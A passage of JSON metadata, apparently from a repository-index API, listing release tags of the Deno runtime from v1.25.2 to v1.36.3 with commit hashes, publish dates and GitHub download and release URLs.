6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:g